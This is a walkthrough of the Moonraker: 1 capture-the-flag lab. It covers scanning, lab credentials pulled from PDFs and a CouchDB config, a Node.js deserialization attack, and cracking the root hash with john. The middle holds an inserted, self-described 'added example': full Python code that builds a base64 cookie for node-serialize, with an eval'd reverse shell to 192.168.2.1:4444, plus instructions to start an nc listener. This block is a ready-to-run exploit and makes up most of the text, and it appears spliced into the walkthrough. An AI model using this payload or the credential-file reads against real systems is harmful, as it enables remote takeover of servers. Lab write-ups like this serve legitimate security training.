Moonraker: 1

Difficulty: Challenging

Posted by Admin on February 3, 2020

CTF link

You've received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villain is unknown we know the motives are ominous and apocalyptic.

Hack into the Moonraker system and discover who's behind these menacing plans once and for all. Find and destroy the Villain before it's too late!

Scan

Find and scan the machine

nmap -A 192.168.2.104

The scan shows an open web port, so let's see what is there.

Opening the web page plays a movie trailer (Moon Rider). When the video ends, we get to the menu page.

Getting shell

After clicking on the bottom button we get to the Moonraker Elite Services page.

Below it there is a link to the Services Information Request page.

After entering the HTML code shown in the image into the upper form, I click the button and a POST request is sent to the svc-processing.php file.

The browser is redirected to http://192.168.2.104/svc-inq/svc-processing.php

I decided to check the logs, and within a minute a request arrived that revealed a new file:

http://192.168.2.104/svc-inq/salesmoon-gui.php

After clicking on the link in this file, I get to the Sales Admin Interface page.

http://192.168.2.104/raker-sales/index.html

That page contains hints for the password of the jaws account on CouchDB (port 5984).

OK: jaws's girlfriend's name is dolly, so dolly + x99 gives the login details.

jaws:dollyx99

After logging in, I open the links tab and see four entries with links:

http://192.168.2.104/cats/cats-gallery.html
http://192.168.2.104/surv-cam/recent.html
http://192.168.2.104/HR-Confidential/offer-letters.html
http://192.168.2.104/x-files/deep-space-findings.html

When I go on the link http://192.168.2.104/HR-Confidential/offer-letters.html, I see the Offer Letter Archive Backup page with .PDF files that contain important data.

In moonraker_hugo.pdf I find the credentials for logging in on port 3000:

hugo:TempleLasersL2K

A Node.js application is running on port 3000.

After analyzing the requests with Burp Suite, I understand that the application deserializes a base64-encoded object from the cookie, so the Node.js deserialization exploit applies here:

https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

Using the nodejsshell.py script I generate a reverse-shell payload for the exploit:

https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

With Burp Decoder I encode it in base64.

Then I paste it into the cookie value.

And I got a shell.
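The whole chain that nodejsshell.py and Burp Decoder perform above, written out as an added example (this is not code from the page or from the nodejsshell.py project): build the node-serialize IIFE, wrap the reverse shell in eval(String.fromCharCode(...)) so the JSON needs no quoting, and base64-encode the object into a cookie value. The listener address 192.168.2.1:4444 and the property name "rce" are assumptions; the cookie name the Moonraker app reads is not given on the page, so check it in Burp before pasting.

```python
import base64
import json
import re

# node-serialize tags serialized functions with this prefix; unserialize() strips
# it and eval()s the rest. Appending "()" turns the function into an IIFE, so it
# executes during deserialization, before the application touches the object.
FUNC_FLAG = "_$$ND_FUNC$$_"


def reverse_shell_js(lhost: str, lport: int) -> str:
    """Node.js reverse shell: spawn /bin/sh and pipe it over a TCP socket."""
    return (
        "var net = require('net'), cp = require('child_process'), "
        "sh = cp.spawn('/bin/sh', []); var client = new net.Socket(); "
        f"client.connect({lport}, '{lhost}', function() {{"
        "client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); "
        "});"
    )


def to_charcode_eval(js: str) -> str:
    """Wrap JS as eval(String.fromCharCode(...)) so the payload contains no quotes
    or backslashes that JSON encoding or the app could mangle (the nodejsshell.py trick)."""
    codes = ",".join(str(ord(ch)) for ch in js)
    return f"eval(String.fromCharCode({codes}))"


def build_cookie(lhost: str, lport: int, key: str = "rce") -> str:
    """Serialized object with one IIFE-valued property, base64-encoded for the cookie."""
    iife = f"{FUNC_FLAG}function(){{{to_charcode_eval(reverse_shell_js(lhost, lport))}}}()"
    serialized = json.dumps({key: iife})
    return base64.b64encode(serialized.encode()).decode()


def decode_cookie(cookie: str) -> dict:
    """Inverse view: the code unserialize() will eval for each flagged property."""
    obj = json.loads(base64.b64decode(cookie))
    return {k: v[len(FUNC_FLAG):] for k, v in obj.items()
            if isinstance(v, str) and v.startswith(FUNC_FLAG)}


def recover_js(func_body: str) -> str:
    """Decode the String.fromCharCode(...) list back to readable JavaScript."""
    m = re.search(r"String\.fromCharCode\(([\d,]+)\)", func_body)
    return "".join(chr(int(n)) for n in m.group(1).split(","))


if __name__ == "__main__":
    # Assumed listener: run `nc -lvnp 4444` on 192.168.2.1 before sending the cookie.
    cookie = build_cookie("192.168.2.1", 4444)
    print(cookie)
    print(recover_js(decode_cookie(cookie)["rce"]))
```

The trailing "()" is the whole exploit: without it, unserialize() only reconstructs a function object and nothing runs; with it, the function is invoked by the eval inside the library before the app ever looks at the cookie.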

Getting hugo

At first I checked the home folder but didn't find anything interesting there. When I checked the CouchDB configuration directory, however, I found the credentials for the hugo account.

cat /opt/couchdb/etc/local.ini
hugo:321Blast0ff!!

Now we connect via SSH as hugo.

Destroy Moonraker system

In the mail spool I found a message addressed to hugo about the new administrator passwords; it also contained a hash of the old password. It's time to turn to john.

less /var/mail/hugo

John cracks the hash and gives us the old root password:

cyber

Combining it with the hint in the letter gives the new root password:

root:cyberVR00M

Now proceed to destroy the moonraker system.

Great job agent.

http://192.168.2.103/semaj-dnob/flag-finale-007-moon/